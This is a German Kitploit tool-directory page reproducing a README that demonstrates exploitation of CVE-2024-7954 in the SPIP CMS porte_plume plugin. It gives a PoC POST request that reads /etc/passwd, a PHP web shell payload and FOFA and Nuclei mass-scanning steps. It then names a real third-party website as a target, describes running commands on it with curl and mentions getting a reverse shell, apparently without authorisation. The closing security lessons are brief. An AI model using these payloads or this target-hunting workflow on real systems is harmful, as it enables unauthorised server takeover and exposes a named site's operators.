Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Exploitation-of-a-Remote-Code-Execution-vulnerability--CVE-2024-7954- — Exploitation of a Remote Code Execution vulnerability- (CVE-2024-7954) | Kitploit
Tools/GitHubGitHub/shivanshkuntal/exploitation-of-a-remote-code-execution-vulnerability--cve-2024-7954-
ReconnaissanceWeb Vulnerability ScannersVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingLearning & EducationRed Teaming

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Payload Development
Labs & Practice
GitHubshivanshkuntal/exploitation-of-a-remote-code-execution-vulnerability--cve-2024-7954-

Exploitation-of-a-Remote-Code-Execution-vulnerability--CVE-2024-7954-

Exploitation of a Remote Code Execution vulnerability- (CVE-2024-7954)

Repository anzeigen
1vor 8 MonatenNoch nicht geprüft
Teilen

Ausnutzung einer Remote Code Execution-Schwachstelle (CVE-2024-7954)

Projekt zum Testen von Softwareschwachstellen Eingereicht von: Shivansh Kuntal


Überblick

Dieses Projekt demonstriert die Ausnutzung von CVE-2024-7954, einer kritischen Remote Code Execution (RCE)-Schwachstelle, die SPIP CMS über das Plugin porte_plume betrifft. Die Schwachstelle ermöglicht es nicht authentifizierten Angreifern, durch präparierte HTTP-POST-Anfragen beliebigen PHP-Code auf dem Zielserver auszuführen.

Die Tests wurden in einer kontrollierten lokalen Umgebung durchgeführt und später auf reale Erkundungen mit FOFA und Nuclei ausgeweitet.


1. Einrichtung der Umgebung

Eine anfällige Version von SPIP CMS, von der bestätigt wurde, dass sie von CVE-2024-7954 betroffen ist, wurde lokal auf einem Apache-Server bereitgestellt, wobei ein GitHub-Repository mit bekannten anfälligen Versionen verwendet wurde.

Verwendete Tools

  • Burp Suite (Abfangen und Modifizieren von HTTP-Anfragen)
  • Apache-Webserver
  • FOFA-Suchmaschine
  • Nuclei-Schwachstellenscanner
  • curl (CLI-Exploitation)

Die auf localhost laufende SPIP-Startseite bestätigte die erfolgreiche Installation und diente als Ziel für die Ausnutzung.


2. Beschreibung der Schwachstelle

Das porte_plume-Plugin (vor den Versionen 4.30-alpha2, 4.2.13, 4.1.16) ist aufgrund unzureichender Bereinigung von benutzereingegebenen Daten anfällig. Angreifer können PHP-Code in bestimmte Formularfelder einschleusen, der später vom Server gerendert und ausgeführt wird.

Auswirkungen: Nicht authentifizierte Remote Code Execution Schweregrad: Kritisch Angriffsvektor: Netzwerk / HTTP POST


3. Proof of Concept (PoC)

Bösartige POST-Anfrage

root@kitploit:~
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{hostname}}
Content-Type: application/x-www-form-urlencoded

data=AA_[<img111111>->URL`<?php system('cat /etc/passwd'); ?>`]_BB

Hinweise

  • PHP-Code wird in die Markdown-Formatierungs-Engine eingeschleust.
  • Wird als SPIP-Benutzer auf dem Server ausgeführt.
  • Der Angriff erfordert keine Authentifizierung.

4. FOFA-Erkundung

Eine FOFA-Abfrage wurde verwendet, um öffentliche SPIP-Installationen aufzulisten:

root@kitploit:~
app="SPIP"

FOFA gab mehrere Metadatenpunkte zurück:

  • HTTP-Header
  • Titel
  • IP-Adressen & Geolokalisierung
  • Server-Technologie-Stack

Erkundungswert

  1. Zielaufzählung: Identifizieren erreichbarer SPIP-CMS-Server.
  2. Versions-Fingerprinting: Feststellen, ob anfällige Plugin-Versionen aktiv sind.
  3. Priorisierung: Auswählen wahrscheinlich ausnutzbarer Systeme.
  4. Exploit-Verifikation: Validieren von Endpunkten mit kontrollierten Payloads.
  5. Automatisierung: Exportieren der FOFA-Ergebnisse in targets.txt für Batch-Scans.

Ein geeigneter realer Host wurde identifiziert:

root@kitploit:~
http://www.comite-tricolore.org/

5. Automatisierte Suche mit Nuclei

Zweck

Da die manuelle Ausnutzung langsam ist, wurde Nuclei verwendet, um die Erkennung von CVE-2024-7954 über eine große Anzahl von Zielen zu automatisieren.

Befehl (benutzerdefinierte Vorlage)

root@kitploit:~
nuclei -l targets.txt -t CVE-2024-7954.yaml
  • -l targets.txt lädt FOFA-Ergebnisse
  • -t lädt benutzerdefinierte PoC-Vorlage

Hinweis: Die erste Vorlage ergab keine Übereinstimmungen.

Breiter CVE-Scan

root@kitploit:~
nuclei -l targets.txt -t cves/

Dieser Scan identifizierte ein reaktionsfähiges Ziel:

root@kitploit:~
http://www.comite-tricolore.org/

6. Manuelle Validierung & Ausnutzung

Schritt 1 — Anfälligen Endpunkt inspizieren

Besuchen Sie:

root@kitploit:~
http://www.comite-tricolore.org/spip.php?page=contact

Bestätigt:

  • Eingabefelder für Name, E-Mail, Nachricht
  • POST-Anfragen-Handler geeignet für Payload-Injektion

Schritt 2 — PHP-Payload einschleusen

Verwenden Sie Burp Suite oder curl, um den Parameter message zu modifizieren:

Payload

root@kitploit:~
<?php system($_GET['cmd']); ?>

Schritt 3 — Befehlsausführung auslösen

Besuchen Sie:

root@kitploit:~
http://www.comite-tricolore.org/spip.php?page=contact&cmd=id

Oder mit curl:

root@kitploit:~
curl "http://www.comite-tricolore.org/spip.php?page=contact&cmd=id"

Ausgabe bestätigte die entfernte Befehlsausführung.

Schritt 4 — Reverse Shell (endgültiger Zugriff)

Ein präparierter Payload ermöglicht einen Reverse-Shell-Callback, der Folgendes erlaubt:

  • whoami
  • ls
  • vollständiger interaktiver Shell-Zugriff

7. Kritische Beobachtungen

  • Nicht authentifizierter Exploit erhöht den Schweregrad dramatisch.
  • Fehler in der Eingabebereinigung im Plugin ist das Kernproblem.
  • Sobald PHP injiziert und gerendert wird, ist eine vollständige Kompromittierung des Servers möglich.
  • Reverse Shell → mögliche Privilegieneskalation → Serverübernahme.
  • Der Angriff ist trivial mit curl, Python-Skripten oder Nuclei zu automatisieren.

8. Fazit

Dieses Projekt demonstriert die vollständige Ausnutzungskette für CVE-2024-7954, von der Erkundung bis zum Erhalt einer interaktiven Shell.

Ausnutzungspfad

  1. Erkundung (FOFA)
  2. Automatisierte Suche (Nuclei)
  3. Manuelle Payload-Injektion
  4. Bestätigte Codeausführung
  5. Reverse-Shell-Zugriff

Sicherheitslektionen

  • Strenge Eingabevalidierung ist für alle benutzerkontrollierten Daten obligatorisch.
  • Plugins müssen sichere Codierungspraktiken befolgen.
  • Organisationen müssen Sicherheitsupdates umgehend anwenden.
  • Regelmäßige Schwachstellenbewertungen sind unerlässlich, um RCE-Angriffe zu verhindern.

Diese Schwachstelle verdeutlicht, wie ein scheinbar harmloses Textformatierungs-Plugin bei unsachgemäßer Sicherung zu einer vollständigen Systemkompromittierung führen kann.

Tool herunterladen